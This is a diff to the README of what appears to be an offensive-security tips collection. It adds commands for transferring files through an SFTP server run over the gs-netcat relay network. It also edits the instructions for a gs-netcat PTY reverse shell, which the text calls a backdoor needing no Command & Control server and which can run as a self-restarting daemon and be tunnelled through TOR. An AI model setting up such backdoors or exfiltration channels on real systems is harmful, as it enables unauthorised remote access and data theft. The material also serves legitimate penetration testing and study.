diff --git a/README.md b/README.md index 7324b6a..baeeddb 100644 --- a/README.md +++ b/README.md @@ -30,6 +30,7 @@ Got tricks? Send them to root@thc.org or submit a pull request. 1. [Multiple binaries](#feb-anchor) 1. [File transfer using screen from REMOTE to LOCAL](#ftsrl-anchor) 1. [File transfer using screen from LOCAL to REMOTE](#ftslr-anchor) + 1. [File transfer using gs-netcat and sftp](#ftgs-anchor) 5. [Reverse Shell / Dumb Shell](#rs-anchor) 1. [Reverse Shells](#rs-anchor) 1. [with gs-netcat](#rswg-anchor) @@ -320,6 +321,20 @@ Get *screen* to slurp the base64 encoded data into screen's clipboard and paste Note: Two C-d are required due to a [bug in openssl](https://github.com/openssl/openssl/issues/9355). + +**4.vii. File transfer - using gs-netcat and sftp** + +Install [gs-netcat](https://github.com/hackerschoice/gsocket). This commands runs a SFTP server through the Global Socket Relay Network: +``` +$ gs-netcat -s MySecret -l -e /usr/lib/sftp-server # Host +``` + +From your workstation execute this command to connect to the SFTP server: +``` +$ export GSOCKET_ARGS="-s MySecret" # Workstation +$ sftp -D gs-netcat # Workstation +``` + --- @@ -328,13 +343,13 @@ Note: Two C-d are required due to a [bug in openssl](https://github.com/openssl/ Install [gs-netcat](https://github.com/hackerschoice/gsocket). It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. This means you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is the equivalent to a swiss army knife than gs-netcat is a german battle axe :> ``` -$ ./gs-netcat -s MySecret -l -i # Host +$ gs-netcat -s MySecret -l -i # Host ``` Use -D to start the reverse shell in the background (daemon) and with a watchdog to auto-restart if killed. To connect to the shell from your workstation: ``` -$ ./gs-netcat -s MySecret -i +$ gs-netcat -s MySecret -i ``` Use -T to tunnel trough TOR.